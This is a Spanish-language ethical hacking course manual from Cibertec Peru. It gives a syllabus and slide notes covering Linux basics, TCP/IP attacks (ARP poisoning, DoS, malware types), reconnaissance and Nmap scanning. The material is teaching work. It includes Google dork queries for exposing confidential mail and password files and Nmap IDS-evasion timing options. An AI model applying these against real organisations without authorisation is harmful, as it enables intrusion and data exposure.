Ethical Hacking

Page 1

CIBERTEC

DIRECCIÓN ACADÉMICA DE EXTENSIÓN PROFESIONAL DIVISIÓN DE ALTA TECNOLOGÍA

Ethical Hacking

40 Horas


Todos los nombres propios de programas, sistemas operativos, equipos hardware, etc., que aparecen en este manual son marcas registradas de sus respectivas compañías u organizaciones.

Ethical Hacking DATPr EthicalHacking 40H – 15082014

CIBERTEC PERU SAC Queda prohibida la reproducción o transmisión total o parcial del contenido de la presente obra en cualesquiera de sus formas, sean electrónicas o mecánicas, sin el consentimiento previo y por escrito del editor


Copyright © Todos los Derechos Reservados - Cibertec Perú SAC

Programa Curso Duración

: : :

Ethical Hacking Ethical Hacking 40 horas SYLLABUS

I.

DESCRIPCIÓN Con el crecimiento exponencial de la Internet y su infraestructura, cada vez son más las organizaciones que apuestan por Internet como un medio, para brindar servicios a sus clientes y guardar su información. En estos tiempos, la información es un activo primordial para la organización y su modelo de negocio. El Ethical Hacking es el proceso por el cual, se utilizan las mismas técnicas y herramientas de un atacante malicioso para atacar a una organización de una manera controlada; esta filosofía resulta de la práctica probada: "para atrapar a un ladrón debes pensar como un ladrón". El objetivo del Ethical Hacking es brindar ayuda a las organizaciones para que tomen todas las medidas preventivas en contra de agresiones maliciosas, valiéndose para ello, de los tests de intrusión, los cuales evalúan la seguridad técnica de los sistemas de información, redes de datos, aplicaciones web, servidores expuestos, etc. Pre-requisitos:  Conocimientos intermedios de redes  Conocimientos básicos de programación

II.

OBJETIVO GENERAL Al finalizar el curso, el alumno podrá:

 Identificar y describir cómo operan los “hackers” cuando atacan servidores y clientes,     

a través de Internet. Realizar una prueba de penetración. Utilizar en forma práctica, las herramientas que se utilizan en un proceso de Ethical Hacking. Explicar la metodología OSSTMM desarrollada por ISECOM, para realizar tests de seguridad. Describir cómo funcionan los ataques más comunes que ocurren en Internet y por consiguiente, cómo protegerse de ellos. Explicar las ventajas del uso de la tecnología y los peligros que se pueden generar si no se tiene implementada una cultura de seguridad.

1


III.

METODOLOGÍA La metodología será expositiva y práctica; apoyada con laboratorios que han sido diseñados para complementar y afianzar el aprendizaje del curso. Los manuales y diapositivas han sido desarrollados a la medida, y se utilizarán mediante los medios multimedia, implementados en las aulas. A cada alumno se le asignará una computadora con el software necesario. Recursos: 

Una computadora personal Syllabus del curso

Material Educativo del curso

IV. EVALUACIÓN Se rendirá durante el curso, laboratorios calificados y se implementará un proyecto cuya especificación técnica será definida por el instructor del curso. El promedio final será obtenido mediante la siguiente fórmula: PF = 0.5*Promedio Laboratorios + 0.5*Examen Final La nota mínima aprobatoria para el curso será 14. (Calificación vigesimal)

2


V.

CONTENIDO ANALITICO

CAPÍTULO No. 1: Introducción al Ethical Hacking

Duración: 4 hrs.

Objetivo: Reconocer y explicar el proceso del Ethical Hacking Temas     

Conceptos Básicos Historia de los Hackers Tipos de Ethical Hacking Etapas del Ethical Hacking Metodologías de Evaluación

Laboratorio No. 1:  Cuestionario de Preguntas  Discusión en clase

CAPÍTULO No. 2: Introducción a Linux

Duración: 4 hrs.

Objetivo: Desenvolverse en una línea de comandos del sistema operativo. Temas    

Introducción Consola de Linux Sistema de Archivos Instalación de Software

Laboratorio No. 2:  Instalación de software utilizando consola  Compilando código C  Interpretando scripts perl, python, bash

CAPÍTULO No. 3: Seguridad en Protocolos TCP/IP

Duración: 6 hrs.

Objetivo: Entender el funcionamiento de los protocolos y sus deficiencias. Conocer el funcionamiento del malware Temas     

Protocolos de la pila TCP/IP Sniffing Envenenamiento ARP Denegación de Servicio Malware (Virus, Troyanos, Gusanos, Bombas Lógicas, Botnets, etc)

Laboratorio No. 3:  Capturando paquetes en la red con Wireshark  Envenenamiento ARP con Etterpcap y arpspoof

3


CAPÍTULO No. 4: Reconocimiento del Objetivo

Duración: 4 hrs.

Objetivo: Conocer el proceso de la etapa de reconocimiento del objetivo. Temas    

Introducción Google Hacking Interrogación DNS Herramientas

Laboratorio No. 4:  Buscando información sensible con Google.  Herramientas host, dig, whois, SamSpade

CAPÍTULO No. 5: Scanning y Enumeración

Duración: 7 hrs.

Objetivo: Comprender y realizar un escaneo de puertos. Temas   

Introducción Escaneo de Puertos y Enumeración de Servicios Nmap

Laboratorio No. 5:  Uso de herramientas de scanning.  RETO: Elevando privilegios en un servidor local.

CAPÍTULO No. 6: Análisis de Vulnerabilidades

Duración: 5 hrs.

Objetivo: Comprender y realizar un análisis de Vulnerabilidades Temas   

Introducción Analizadores a Nivel Plataforma Analizadores a Nivel Aplicación

Laboratorio No. 6:  Reconociendo vulnerabilidades a nivel plataforma con Nessus,NeXpose  Análisis de Vulnerabilidades a nivel aplicación.

CAPÍTULO No. 7: Inseguridad en Aplicaciones Web

Duración: 6 hrs.

Objetivo: Explotar vulnerabilidades en sistemas y aplicaciones. Temas   

Introducción Vulnerabiliaddes Web Frameworks de Aprendizaje

Laboratorio No. 7:  Explotando vulnerabilidades Web (RFI, SQLi, LFI)  Atacame (Reto)

4


CAPÍTULO No. 8: Explotación de Vulnerabilidades

Duración: 4 hrs.

Objetivo: Conocer las vulnerabilidades Web y cómo son explotadas. Temas    

Trabajando con Exploits Metasploit Framework La Navaja Suiza del Hacker Password Cracking

Laboratorio No. 8:  Explotando vulnerabilidades con Metasploit  Consiguiendo una shell con Netcat EVALUACIÓN FINAL

Duración: 1 hr.

VI. REFERENCIAS BIBLIOGRAFICAS Y VIRTUALES Libros:

 Penetration Testing And Network Defense. (2005). Cisco Press. United States of America

 Penetration Tester's Open Source Toolkit. (2007). Syngress. United States of America  The Web Application Hackers Handbook (2009). Wiley Publishing. United States of America

 Hacking Exposed 6th Edition. (2009). McGraw-Hill. United States of America  Google Hacking For Penetration Testers. (2005). Syngress. United States of America  Material Técnico de Open-Sec.(2009) Perú

5


oidiiddhufhahfofhjfhajos


División de Alta Tecnología Ethical Hacking

Introducción al Ethical Hacking

1.0

Contenido de Agenda 

Conceptos básicos

Historia de los Hackers

Tipos de Evaluación

Etapas del Ethical Hacking

Metodología de Evaluación

1


División de Alta Tecnología Ethical Hacking

1.1. Origen de los Problemas de Seguridad

Debido a la creciente interconexión entre los sistemas de información y las redes digitales, existe un mayor rango de ataque de personas no autorizadas, las cuales pueden tener consecuencias catastróficas para una organización.

1.2. Amenazas, Vulnerabilidades y Riesgos

2


División de Alta Tecnología Ethical Hacking

1.3. Evolución de Ataques Manipulación de Paquetes / Spoofing Análisis “Ocultos” DDoS Sweepers Back Doors Sniffers

Alto

Programas auto replicados

Explotación de vulnerabilidades conocidas

O-day exploits

1980

Sofisticación de las herramientas de los atacantes

Deshabilitar auditorías

Password Cracking

Adivinar Passwords

Bajo

Gusanos en Internet

1990

Conocimiento técnico requerido

2000+

1.4. Conceptos de Seguridad Se puede entender como seguridad, al estado que define un activo basándose en 3 principios: a)

Confidencialidad: la información sólo puede acceder a las personas autorizadas para ello.

b)

Integridad: la información ha de estar completa y correcta en todo momento.

c)

Disponibilidad: la información está lista para acceder a ella, por un usuario válido.

3


División de Alta Tecnología Ethical Hacking

Contenido de Agenda 

Conceptos básicos

Historia de los Hackers

Tipos de Evaluación

Etapas del Ethical Hacking

Metodología de Evaluación

2.1. Definición del Hacker Originalmente, el término hacker no tenía connotaciones negativas. Un hacker era concebida como una persona con elevados conocimientos y gran curiosidad, que deseaba aprender tanto como pueda sobre sistemas informáticos.

4


División de Alta Tecnología Ethical Hacking

2.2. Los Primeros Hackers a) b) c) d)

PDP-1 MIT Tech Model Railroad Club ARPANET

2.3. Surgimiento de UNIX a) b) c) d) e) f)

Laboratorios Bell Multics C USENET Free Software Foundation Linus Torvalds

5


División de Alta Tecnología Ethical Hacking

2.4. Los Hackers Famosos

a) Kevin Mitnick b) Adrian Lamo c) Tsutomu Shimomura

2.5. Principales Clasificaciones a) b) c) d) e) f)

Hackers Crackers Lamers Newbie Phreakers Cyber-Terrorist

6


División de Alta Tecnología Ethical Hacking

2.6. Terminología del Hacker a) b) c) d) e) f) g)

Trazabilidad Autenticidad Activo Amenaza Vulnerabilidad Riesgo Ataque

2.6. Terminología del Hacker El Hackeo Ético es una herramienta defensiva que evalúa las medidas de seguridad, simulando un intento de intrusión y que es desarrollado antes de que ocurra un ataque para descubrir vulnerabilidades.

7


División de Alta Tecnología Ethical Hacking

2.6 Terminología del Hacker

El Ethical Hacking es el proceso desarrollado en un ambiente controlado, por el cual se utilizan las mismas técnicas y herramientas utilizadas por un atacante malicioso, para vulnerar la seguridad de las redes de una organización con el propósito de evaluar el estado de su seguridad.

2.6. Terminología del Hacker Seguridad de la Información Protege la información de un amplio espectro de amenazas, a efectos de asegurar la continuidad y minimizar los daños a la empresa maximizando el retorno de inversión.

Seguridad Informática Asegura los recursos del sistema de información (material informático o programas) de la empresa para ser utilizados de la manera en que se decidió.

8


División de Alta Tecnología Ethical Hacking

2.7. Estudios y Certificaciones

Contenido de Agenda 

Conceptos básicos

Historia de los Hackers

Tipos de Evaluación

Etapas del Ethical Hacking

Metodología de Evaluación

9


División de Alta Tecnología Ethical Hacking

3.1. Evaluaciones del Ethical Hacking

Se organizan según el conocimiento de los detalles de implementación de los consultores, sobre el sistema a ser evaluado. Según esta métrica, existen 3 tipos:

WHITEBOX

BLACKBOX GRAYBOX

3.2. Testeo de Seguridad de Internet

10


División de Alta Tecnología Ethical Hacking

Contenido de Agenda 

Conceptos básicos

Historia de los Hackers

Tipos de Evaluación

Etapas del Ethical Hacking

Metodología de Evaluación

4.1. Procesos del Ethical Hacking

a) b) c) d) e)

Reconocimiento Scanning Conseguir Acceso Mantener Acceso Borrar Huellas

11


División de Alta Tecnología Ethical Hacking

4.1. Procesos del Ethical Hacking 2

1

4 5 3

Contenido de Agenda 

Conceptos básicos

Historia de los Hackers

Tipos de Evaluación

Etapas del Ethical Hacking

Metodología de Evaluación

12


División de Alta Tecnología Ethical Hacking

5.1. Procedimiento de Evaluación

5.2. Puntos de Evaluación

a) b) c) d) e) f)

Seguridad de la Información Seguridad de los Procesos Seguridad en las Tecnologías de Internet Seguridad en las Comunicaciones Seguridad Inalámbrica Seguridad Física

13


División de Alta Tecnología Ethical Hacking

Laboratorio nº 1 Ejercicio 1: 

Desarrolle el siguiente laboratorio e intercambie los resultados entre sus compañeros, lo que le permitirá obtener valiosas conclusiones 

Tiempo Estimado: 15 minutos

14


División de Alta Tecnología Ethical Hacking

2.0

Introducción al Ethical Hacking Sistema Operativo Linux

Contenido de Agenda 

Introducción

Consola de Linux

Sistema de Archivos

Instalación del Software

1


División de Alta Tecnología Ethical Hacking

1.1. ¿Qué es un Sistema Operativo?

Es un software que implementa una colección de rutinas que actúa como interfaz entre el hardware y los aplicativos utilizados por el usuario. Es responsable de gestionar y coordinar el acceso al hardware para los distintos aplicativos que se ejecutan.

1.2. ¿Qué es un Sistema Informático?

Es el conjunto de partes interrelacionadas, hardware, software y de recurso humano. Un sistema informático típico emplea una computadora que usa dispositivos programables para capturar, almacenar y procesar datos. USUARIO 1

USUARIO 2

USUARIO 3

USUARIO N

PROGRAMAS DE APLICACIÓN SISTEMA OPERATIVO HARDWARE

2


División de Alta Tecnología Ethical Hacking

1.3. GNU/Linux /Libertades Software Libre GNU Linux a) Poderoso y versátil S.O. de licencia libre b) Núcleo (Linus Torvalds) combinado con sistema GNU c) Desarrollo de la comunidad Libertades Software Libre a) Usar con cualquier propósito b) Modificar y adaptarlo a necesidades c) Distribuir copias d) Licencia Pública General GNU

1.4. Distribuciones a) b) c) d) e) f) g)

Ubuntu RedHat Fedora Debian Suse Enterprise OpenSuse Gentoo

3


División de Alta Tecnología Ethical Hacking

Contenido de Agenda 

Introducción

Consola de Linux

Sistema de Archivos

Instalación del Software

2.1. Antecedentes a) En Linux es frecuente la interacción con la consola o línea de comandos. b) En modo gráfico se presentan opciones dadas por el diseñador, mientras que en modo consola se tiene las funcionalidades creadas por el programador. c) La línea de comandos permite ejecutar utilidades con mayor rapidez en comparación con la interfaz gráfica y consumen menos recursos, ya que no es necesario cargar librerías gráficas.

4


División de Alta Tecnología Ethical Hacking

2.1. Antecedentes d) La mayoría de las herramientas liberadas utilizadas para Ethical Hacking están diseñadas para consola. e) Es importante que una persona que desea realizar un proceso de Ethical Hacking pueda desenvolverse cómodamente en la línea de comandos del sistema operativo Linux.

2.2. Comandos Básicos Los principales comandos GNU/Linux para consola son: a) b) c) d) e) f) g) h)

LS: lista ficheros de un directorio PWD: visualiza el directorio actual CD: cambia de directorio MV: mover o renombrar ficheros CP: copia ficheros CAT: muestra en pantalla contenido del archivo HED: muestra 10 primeras líneas del archivo TAIL: muestra 10 últimas líneas del archivo

5


División de Alta Tecnología Ethical Hacking

2.3. Gestión de Usuarios El GNU/Linux es multiusuario por lo que es necesaria la gestión de los usuarios que harán uso del sistema. En un GNU/Linux hay usuarios normales, sistema y ROOT. Los principales comandos son: a) b) c) d) e)

Useradd Userdel Passwd Groups Groupadd

2.4. Configuración de Red Para que un computador tenga conectividad y acceso a Internet se necesitará 3 cosas: a) Dirección IP privada con su respectiva máscara de red b) Puerta de enlace por donde se enviarán los paquetes c) Servidores DNS para resolver dominios a conectarse Ejemplo: a) IFCONFIG eth0 192.168.1.30 netmask 255.255.255.0 b) ROUTE ADD DEFAULT gw 192.168.1.1 c) VI /ETC/RESOLV.CONF d) NAMESERVER 8.8.8.8

6


División de Alta Tecnología Ethical Hacking

Contenido de Agenda 

Introducción

Consola de Linux

Sistema de Archivos

Instalación del Software

3.1. Antecedentes y Comandos En el momento de la instalación, Linux crea una estructura de directorios básica, definida por Filesystem Hierarchy Standard Group, llamada Filesystem Hierarchy Standard

7


División de Alta Tecnología Ethical Hacking

3.1. Antecedentes y Comandos

3.2. Permisos del Sistema de Archivos El sistema de permisos de GNU/Linux tiene un esquema de usuarios y grupos, el cual se convierte en la base para la seguridad. A los usuarios y grupos se les delega permisos sobre los archivos y directorios. Los tipos de usuarios en Linux son: a) Owner: usuario dueño de la carpeta o el archivo b) Group: grupo de usuarios con permisos similares c) Other: cualquier otro usuario Los tipos de permiso son R(read), W(write) y X(execute)

8


División de Alta Tecnología Ethical Hacking

3.2. Permisos del Sistema de Archivos

3.3. Listado de Comandos

9


División de Alta Tecnología Ethical Hacking

Contenido de Agenda 

Introducción

Consola de Linux

Sistema de Archivos

Instalación del Software

4.1. Introducción a) En todo sistema se hace necesaria la instalación de nuevo software que añada nueva funcionalidad a la ya existente. Para GNU/Linux, dependiendo de la distribución, el software puede ser instalado de varias maneras. b) Es posible instalar software desde los repositorios propios de la distribución, a través de paquetes y compilando el código fuente. c) Existen 2 aplicaciones que sirven para instalar el software, a través de línea de comandos y desde los repositorios: APT-GET y APTITUDE.

10


División de Alta Tecnología Ethical Hacking

4.2. Comando de Instalación a) APTITUDE install nombre paquete b) APTITUDE install firefox c)

APTITUDE search firefox

d) APTITUDE remove firefox e)

APTITUDE show firefox

4.2. Comando de Instalación a) TAR xvzf fuente.tar.gz b) CD fuente c)

./CONFIGURE

d) MAKE e)

MAKE install (opcional)

11


División de Alta Tecnología Ethical Hacking

4.3. Proceso de Instalación

Laboratorio nº 2 

Ejercicio: 

Tiempo: 30 minutos

Desarrolle el siguiente laboratorio e intercambie los resultados entre sus compañeros, lo que le permitirá, obtener valiosas conclusiones

12


División de Alta Tecnología Ethical Hacking

3.0

Seguridad en Protocolos TCP/IP

Contenido de Agenda 

Protocolos de la pila TCP/IP

Sniffing

Envenenamiento ARP

Denegación de Servicio

Malware

1


División de Alta Tecnología Ethical Hacking

1.1. Introducción a Protocolos de Comunicación

1.2. ¿Qué es un Protocolo? Un protocolo puede ser visto como un lenguaje que utilizan las computadoras para comunicarse e intercambiar información entre sí. Los protocolos permiten que equipos con diferentes arquitecturas o sistemas operativos se enlacen.

2


División de Alta Tecnología Ethical Hacking

1.3. El Modelo OSI

1.4. El Modelo TCP/IP

3


División de Alta Tecnología Ethical Hacking

1.4. El Modelo TCP/IP

1.4. El Modelo TCP/IP a) Es un protocolo de red que implementa el mecanismo de entrega de paquetes de datos. b) No provee ningún mecanismo para determinar si un paquete alcanza su destino o no, por eso se dice que no es orientado a conexión

4


División de Alta Tecnología Ethical Hacking

1.5. Protocolo TCP (Transmission Control Protocol) a) TCP es un protocolo que tiene un diseño orientado a la conexión y brinda fiabilidad a la entrega de paquetes. b) Las aplicaciones necesitan una comunicación fiable y el IP no lo da, TCP añade funciones necesarias para una comunicación libre de errores y sin pérdidas.

Contenido de Agenda 

Protocolos de la pila TCP/IP

Sniffing

Envenenamiento ARP

Denegación de Servicio

Malware

5


División de Alta Tecnología Ethical Hacking

2.1. Definición

El sniffing (olfatear) es una técnica que consiste en monitorear el tráfico de una red local, mediante cambios en la configuración de la tarjeta de red.

2.2. Wireshark a) Es un analizador de paquetes de software libre utilizado para visualizar el tráfico que fluye en la red. b) Identifica y soluciona los problemas de conectividad en una red, pero también puede ser utilizado de forma maliciosa para conseguir información confidencial.

6


División de Alta Tecnología Ethical Hacking

Contenido de Agenda 

Protocolos de la pila TCP/IP

Sniffing

Envenenamiento ARP

Denegación de Servicio

Malware

3.1. Definición y Conceptos a) Un switch es un equipo de conectividad que trabaja en la capa de enlace similar a un concentrador. b) Un switch es capaz de analizar una trama antes de enviarla por alguno de sus puertos.

7


División de Alta Tecnología Ethical Hacking

3.1. Definición y Conceptos c)

Los switches trabajan mandando el tráfico sólo al segmento de red donde se encuentra el host destino. d) Esto debido a que los poseen las denominadas tablas CAM (memoria de contenido direccionable), donde se almacena la información de las direcciones MAC

3.2. Protocolo ARP a) Es un analizador de paquetes de software libre utilizado para visualizar el tráfico que fluye por una red. b) Se envía un paquete (ARP REQUEST) al broadcast y se espera que el equipo responda (ARP REPLY) con la dirección MAC.

8


División de Alta Tecnología Ethical Hacking

3.3. Causas del Envenenamiento ARP a) Ausencia de autenticación en el protocolo. b) La tabla ARP está sujeta a alteraciones externas. c) Puede enviarse mensajes ARP falsos.

3.4. Herramientas ARP a) ARPSPOOF es una herramienta gratuita en modo consola que es parte de la suite de tools llamando DSNIFF que permite implementar ataques Man In The Middle enviando paquetes ARP falsos que engañan a otros equipos dentro de una red local. b) ETTERCAP es una herramienta de software libre, inicialmente fue desarrollada tan sólo como un analizador de paquetes pero que con el proceso de desarrollo logró convertirse en una herramienta para realizar ataques Man in the Middle.

9


División de Alta Tecnología Ethical Hacking

Contenido de Agenda 

Protocolos de la pila TCP/IP

Sniffing

Envenenamiento ARP

Denegación de Servicio

Malware

4.1. Introducción Un ataque de denegación de servicio, también llamado DoS (Denial of Service) es un ataque a un sistema de computadoras o red, que causa que un servicio o recurso sea inaccesible a los usuarios legítimos.

10


División de Alta Tecnología Ethical Hacking

4.2. Denegación del Servicio a) Consumo de los recursos computacionales: ancho de banda, espacio en disco, tiempo de procesador . b) Alteración de información de configuración: información de rutas de encaminamiento . c) Alteración de la información del estado: interrupción de sesiones TCP (TCP reset). d) Interrupción de componentes físicos de red. e) Obstrucción de medios de comunicación entre usuarios de un servicio y la víctima.

4.3. Tipos de Ataque (Denegación de Servicio) a) DoS: este tipo de ataque se caracterizan por tener un único origen desde el cual se realiza el ataque. b) Ddos: este tipo de ataque utiliza varias fuentes para realizar un ataque progresivo, rotatorio o total en forma coordinada. Normalmente, se asocia a una campaña Botnet que infecta miles de equipos con un malware.

11


División de Alta Tecnología Ethical Hacking

4.4. Los Ataques más Populares Syn Flood El cliente envía un paquete SYN, pero no responde al paquete ACK ocasionando que el servidor permanezca a la escucha, un determinado tiempo hasta cancelar la llamada.

4.4. Los Ataques más Populares

ICMP Flood Consiste en el envío de forma continua de un número elevado de paquetes ICMP (Echo Request) de tamaño considerable hacia la víctima de forma que ésta ha de responder con paquetes ICMP (Echo Reply), lo que supone una sobrecarga, tanto en la red como en el sistema de la víctima.

12


División de Alta Tecnología Ethical Hacking

4.4. Los Ataques más Populares SMURF Es una variante de ICMP Flood, por la cual el atacante envía grandes cantidades de tráfico ICMP (ping) a la dirección de broadcast de una red, cambiando la dirección de origen (spoofing) por la dirección de la víctima. Los equipos de la red recibirán los mensajes ICMP (echo request) y lo responderán, multiplicando el tráfico por cada host de la subred.

4.4. Los Ataques más Populares

TEARDROP El ataque Teardop se basa en introducir información de compensación falsa en los paquetes fragmentados. En consecuencia, durante el reensamblado, quedan fragmentos vacíos o superpuestos que pueden desestabilizar el sistema.

13


División de Alta Tecnología Ethical Hacking

Contenido de Agenda 

Protocolos de la pila TCP/IP

Sniffing

Envenenamiento ARP

Denegación de Servicio

Malware

5.1. Definición

Es un tipo de software que tiene como objetivo infiltrarse o dañar una computadora sin el consentimiento de su propietario. El término malware incluye virus, gusanos, troyanos, rootkits, spyware, entre otros.

14


División de Alta Tecnología Ethical Hacking

5.2. Tipos de Malware a) b) c) d) e) f) g) h) i) j) k)

Troyano Virus Bomba Lógica Botnet Gusano Keylogger Stealer Rootkit Adware Spyware Backdoor

5.3. Medios de Infección a) b) c) d) e) f)

Portales Web Falsas Páginas Web que explotan vulnerabilidades Redes P2P Vulnerabilidades Correos Electrónicos Medios de Almacenamiento

15


División de Alta Tecnología Ethical Hacking

Laboratorio nº 3

Ejercicio:  

Tiempo: 60 minutos Desarrolle el siguiente laboratorio e intercambie los resultados entre sus compañeros, lo que le permitirá, obtener valiosas conclusiones

16


División de Alta Tecnología Ethical Hacking

Reconocimiento del Objetivo

4.0

Contenido de Agenda 

Introducción

Google Hacking

Interrogación DNS

Herramientas

1


División de Alta Tecnología Ethical Hacking

1.1. Antecedentes

1.1. Antecedentes

a) En inicio de un proceso de Ethical Hacking es el acercamiento para conseguir información de la organización de manera pasiva. b) Su objetivo principal es mapear la organización objetivo del mundo real a un mundo virtual o cibernético. c) Se define mundo cibernético, como un conjunto de direcciones IP relevantes y alcanzables.

2


División de Alta Tecnología Ethical Hacking

1.2. Principales Objetivos a) b) c) d) e) f) g) h)

Nombres de dominio Direcciones IP Información de registro (IP, Dominio) Rangos de red Proveedor de Internet Tecnologías utilizadas Arquitectura de Red Información relevante

Contenido de Agenda 

Introducción

Google Hacking

Interrogación DNS

Herramientas

3


División de Alta Tecnología Ethical Hacking

2.1. Definición y Conceptos a) Los motores de búsqueda permiten encontrar cualquier cosa en Internet (Page Rank, Deepbot, Freshbot) b) Los operadores de búsqueda de Google son términos de consulta que realizan acciones especiales que permiten localizar de forma rápida y precisa la información. c) Los operadores de búsqueda más utilizados para la técnica Google Hacking son: • Site: limita los resultados de la búsqueda al dominio. • Inurl: restringe resultado de búsqueda a las URL's. • Filetype: restringe el resultado a documentos. • Intitle: palabras en el título de páginas HTML • Intext: palabras en el contenido de páginas HTML

2.1. Definición y Conceptos d) Google Hacking es una técnica que utiliza a Google y su potencial para encontrar información privada de la organización. e) Con esta técnica se consigue el perfil de una empresa en forma pasiva sin utilizar técnicas intrusivas sobre los servidores.

4


División de Alta Tecnología Ethical Hacking

2.2. Operadores de Búsqueda a) Lectura de mails confidenciales filetype:mbx intext:Subject intitle:index.of inbox b) Logs de aplicaciones ws_ftp filetype:log filetype:log c)

access

Ficheros con passwords filetype:bak createobject sa filetype:inc mysql_connect()

Contenido de Agenda 

Introducción

Google Hacking

Interrogación DNS

Herramientas

5


División de Alta Tecnología Ethical Hacking

3.1. Protocolo DNS a) El protocolo DNS (Domain Name System) puede ser considerado como la espina dorsal de Internet. b) Es como una base de datos distribuida y jerárquica, que almacena toda la información asociada a nombres del dominio. c) Transferencia de Zona.

3.2. Tipos de Registros DNS

6


División de Alta Tecnología Ethical Hacking

3.3. Software de Apoyo Consola a) Whois b) Dig. c) Host

Web a) RIR b) Netcraft (www.netcraft.com) c) Clez (www.clez.net)

Contenido de Agenda 

Introducción

Google Hacking

Interrogación DNS

Herramientas

7


División de Alta Tecnología Ethical Hacking

4.1. Introducción

El objetivo de la etapa de Reconocimiento es encontrar toda la información posible sobre la organización, antes de continuar con la siguiente etapa.

4.2. Software de Reconocimiento a) b) c) d) e)

Wayback Machine (www.archive.org) Fierce Dnsmap Metagoofil TheHarverster

8


División de Alta Tecnología Ethical Hacking

Laboratorio nº 4

Ejercicio:  

Tiempo: 60 minutos Desarrolle el siguiente laboratorio e intercambie los resultados entre sus compañeros, lo que le permitirá obtener valiosas conclusiones.

9


oidiiddhufhahfofhjfhajos


División de Alta Tecnología Ethical Hacking

5.0

Scanning y Enumeración

Contenido de Agenda 

Introducción

Escaneo y Enumeración

Nmap

1


División de Alta Tecnología Ethical Hacking

1.1. Antecedentes a) Una vez terminado el reconocimiento se tiene una lista de objetivos pertenecientes a la organización además de información relevante sobre el objetivo. b) El objetivo es descubrir puertos abiertos y servicios que se encuentran funcionando en dichos puertos. c) El atacante empieza a obtener más información sobre el objetivo realizando las siguientes acciones: – Reconocer equipos activos en el rango objetivo. – Descubrir servicios ejecutándose en los objetivos. – Identificar el sistema operativo. – Enumerar los servicios.

Contenido de Agenda 

Introducción

Escaneo y Enumeración

Nmap

2


División de Alta Tecnología Ethical Hacking

2.1. Conceptos Básicos Dirección IP Es una dirección lógica de 32 bits que identifica de forma unívoca a un equipo dentro de una red. Cuando uno se encuentra en una red local, ésta tendrá dos pares de direcciones. Una dirección IP privada y otra pública.

2.1. Conceptos Básicos Puerto Es un número de 16 bits que puede estar entre 0 y 65535. Permite establecer conexiones diferenciadas entre máquinas. Un puerto tiene 3 estados: abierto, cerrado y bloqueado.

3


División de Alta Tecnología Ethical Hacking

2.1. Conceptos Básicos Socket Es un concepto abstracto por el cual 2 aplicaciones situadas en computadores distintas (o en la misma) pueden intercambiar un flujo de datos. De manera más técnica, un socket es definido por una dirección IP, un protocolo de transporte y un número de puerto.

2.1. Conceptos Básicos Socket Toda conexión en Internet está identificada por un socket, es decir, una máquina de origen (con su respectiva dirección IP) con su puerto, y una máquina de destino con su puerto.

4


División de Alta Tecnología Ethical Hacking

2.1. Conceptos Básicos Conexión TCP El establecimiento de conexiones en TCP tiene un proceso prefijado y tiene por finalidad, sincronizar los 2 host que participarán en la futura conexión. El llamado three way handshake o saludo en tres vías.

2.2. Tipos de Escaneos Ping Sweep Consiste enviar un ECHO REQUEST a los equipos especificados en espera de respuestas ECHO REPLY, para determinar qué equipos dentro de una red se encuentran activos.

5


División de Alta Tecnología Ethical Hacking

2.2. Tipos de Escaneos TCP Connect La técnica consiste en realizar un saludo de 3 vías a cada uno de los puertos del host escaneado. Este escaneo es el más preciso; sin embargo, su principal desventaja es el “ruido” que ocasiona lo hace más fácil de detectar por los firewalls.

2.2. Tipos de Escaneos SYN Scan Conocida como Half Open. Se envía un paquete SYN y espera respuesta. Si un SYN/ACK retorna se toma como abierto, si RST retorna se toma como cerrado y si no hay respuesta, se toma como filtrado.

6


División de Alta Tecnología Ethical Hacking

2.2. Tipos de Escaneos SYN Scan La diferencia con TCP Connect, es que de estar abierto y recibir un SYN/ACK, el equipo que escanea no responde con paquete ACK, sino que envía un RST para terminar la conexión y evitar que el sistema lo registre como un intento de conexión.

2.2. Tipos de Escaneos NULL Scan Este escaneo se basa en enviar un paquete malformado con todos los flags TCP desactivados y esperar la respuesta. Según el RFC 793, si un sistema recibe un paquete hacia un puerto cerrado TCP, sin ningún flag activo, deberá responder con un RST.

7


División de Alta Tecnología Ethical Hacking

2.2. Tipos de Escaneos XMAS Scan Este escaneo se basa en enviar un paquete TCP al sistema escaneado con 3 flags activos: URG, PSH y FIN. Los resultados son iguales a los de un Null Scan: si la respuesta es RST, el puerto se encuentra cerrado y si no hay respuesta, el puerto se encuentra o abierto o filtrado.

2.2. Tipos de Escaneos FIN Scan El escaneo FIN consiste en enviar un paquete TCP al puerto escaneado con el flag FIN activo. Es conocido como el stealth scan (escaneo silencioso) dado que es el escaneo más discreto que existe. El puerto se determinará abierto o cerrado según la respuesta al igual que los 2 escaneos anteriores.

8


División de Alta Tecnología Ethical Hacking

2.2. Tipos de Escaneos UPD Scan Las técnicas anteriores se basan en el escaneo de servicios que utilicen el protocolo TCP. El escaneo consiste en enviar un paquete UDP vacío al puerto objetivo. El sistema responderá con un paquete ICMP tipo 3, si el puerto está cerrado, en caso de no responder el puerto puede estar o abierto o filtrado.

2.3. Enumeración de los Servicios La etapa de enumeración de servicios consta de reconocer el programa demonio (daemon) que gestiona el servicio trabajando en el puerto específico, una vez reconocido un puerto como abierto.

9


División de Alta Tecnología Ethical Hacking

2.3. Enumeración de los Servicios

Banner Grabbing se le denomina a la técnica que consiste en establecer una conexión hacia un servicio y visualizar la información que el demonio brinda sobre sí mismo (el banner).

2.3. Enumeración de los Servicios

10


División de Alta Tecnología Ethical Hacking

2.3. Enumeración de los Servicios

Contenido de Agenda 

Introducción

Escaneo y Enumeración

Nmap

11


División de Alta Tecnología Ethical Hacking

3.1. Definición Network mapper es un software libre escaneador de puertos por excelencia. Originalmente, fue programado por Gordon Lyon (Fyodor) en septiembre de 1997. Actualmente es utilizado para evaluar la seguridad de los sistemas informáticos, así como, para descubrir servicios y servidores en una red informática.

3.2. Tipos de Escaneo

12


División de Alta Tecnología Ethical Hacking

3.3. Otros Comandos a) -PN: no intenta enviar un ping al equipo escaneado. b) -V: obtiene información adicional. c) --Reason: muestra la razón porque el puerto fue tomado como abierto, cerrado o filtrado. d) -P: Nmap por defecto escanea .los 1000 puertos más conocidos e) -sC: permite utilizar, programar y compartir los scripts utilizando el lenguaje de programación LUA. f) -sV: reconoce si un puerto está abierto, interrogue al puerto para realizar una detección del servicio. g) -O: analiza respuestas para determinar el SO.

3.3. Otros Comandos a) b) c) d) e) f)

paranoid (0) Evasión IDS, serializado, 5 minutos de gap sneaky (1) 15 segundos de gap polite (2) 0.4 segundos de gap normal (3) verificaciones en paralelo aggressive (4) 10 milisegundos de gap insane (5) 5 milisegundos de gap

13


División de Alta Tecnología Ethical Hacking

Laboratorio nº 5

Ejercicio:  

